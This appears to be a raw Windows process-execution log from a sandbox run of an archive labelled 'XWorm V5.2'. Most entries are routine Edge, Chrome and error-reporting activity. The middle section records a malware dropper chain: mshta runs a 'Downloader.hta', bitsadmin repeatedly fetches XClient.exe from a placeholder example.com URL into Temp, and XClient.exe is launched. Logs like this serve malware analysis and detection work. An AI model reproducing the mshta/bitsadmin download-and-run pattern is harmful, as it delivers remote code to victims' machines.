C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe" /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntCMDdERDM0NC01N0FCLTQ4MTAtOEVDNC02MTRDQTI4RDU5NkZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RHhPYmpIR2ErblJhMmF0QzN3bytJRXBDNzgrWlllQVVia1hwREMyY2o3VT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE4NS4yOSIgbmV4dHZlcnNpb249IjEuMy4xODcuMzciIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijk4MTIzODY5OTYiIGluc3RhbGxfdGltZV9tcz0iNTAwIi8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{8717535A-2A62-4463-8231-11A4E1E2494F}"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RDlEODVGRUYtRDczNS00NTgxLTlGOEYtMzVGNDI2OUZFMDA2fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0R4T2JqSEdhK25SYTJhdEMzd28rSUVwQzc4K1pZZUFVYmtYcERDMmNqN1U9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjExMC4wLjU0ODEuMTA0IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIyMCIgaW5zdGFsbGRhdGV0aW1lPSIxNzE0MTM1OTIwIiBvb2JlX2luc3RhbGxfdGltZT0iMTMzNTg2MzM2ODk5ODcxMjcwIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjExNDA2OCIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTgxODI1NzAzNyIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=5900 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5452 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5700 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5764 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5824 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3200 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5624 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5300 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winzip28.exe
"C:\Users\Admin\Downloads\winzip28.exe"
C:\Users\Admin\AppData\Local\Temp\e60578a\winzip28.exe
run=1 shortcut="C:\Users\Admin\Downloads\winzip28.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=5392 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5528 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2028" "1156" "1028" "1152" "0" "0" "0" "0" "0" "0" "0" "0"
C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2536" "1144" "852" "1164" "0" "0" "0" "0" "0" "0" "0" "0"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap8850:104:7zEvent30402
C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x3b8
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe" --edgeupdate-client --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.97 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff649a688c0,0x7ff649a688cc,0x7ff649a688d8
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MEIwNUNBQjctRTQ3RC00OTQxLUEzMTktRDQ1OUI5QTE4MUMxfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntGMDI4NDM5Ny1ERDU5LTQ4NDQtOEJCNS0zQTRGMTQyNjQ4NER9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-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-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_UDE9MTcxNjQ3MDEwOSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1XaSUyZlYxbmh4M1R1YVJ2cG5DN3VZZHJpdDFpWXMza2NOTlJtY0dzbEFZdnFNdlk0M3BMJTJmR0RHeXZQUXdBaG44NkI0eWMlMmJ0TjZlZHBvemZyNVJQV2olMmJRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjE2Ii8-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-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-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_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_UDE9MTcxNjQ3MDExMCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1IYzNsN1RrQWpRdXdQa0FzWnJEUEplWlA5VU9HU0pBNDY4UU95dnNydXRBM1dYaTdVNzhhTlZ6bTczenRHbDc3M2wyanhOMTNyeWFKcTZzcGh5dFE0QSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE4MDQ0NDQ4IiB0b3RhbD0iMTgwNDQ0NDgiIGRvd25sb2FkX3RpbWVfbXM9IjQyNDUz
Ii8-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
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\65c21cc89d7241d08029fd3d521a3d0d /t 3972 /p 1416
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\a284fa71977c4d07b165b4e01ea74755 /t 2528 /p 3036
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\bf7dfa9e02594b0ba45c304c5909f3aa /t 5924 /p 2748
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nwziktfv\nwziktfv.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA45.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc452407B64AF34E638FEE2B663DFEA14.TMP"
C:\Users\Admin\Desktop\XClient.exe
"C:\Users\Admin\Desktop\XClient.exe"
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\84e674974693413fb2da20541d821761 /t 5508 /p 4760
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\6ddd34487f6d4558aea4391e53af883e /t 3068 /p 5152
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\f3823bc9b97c462f89116c5ece3af7df /t 5792 /p 2436
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6878888c0,0x7ff6878888cc,0x7ff6878888d8
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
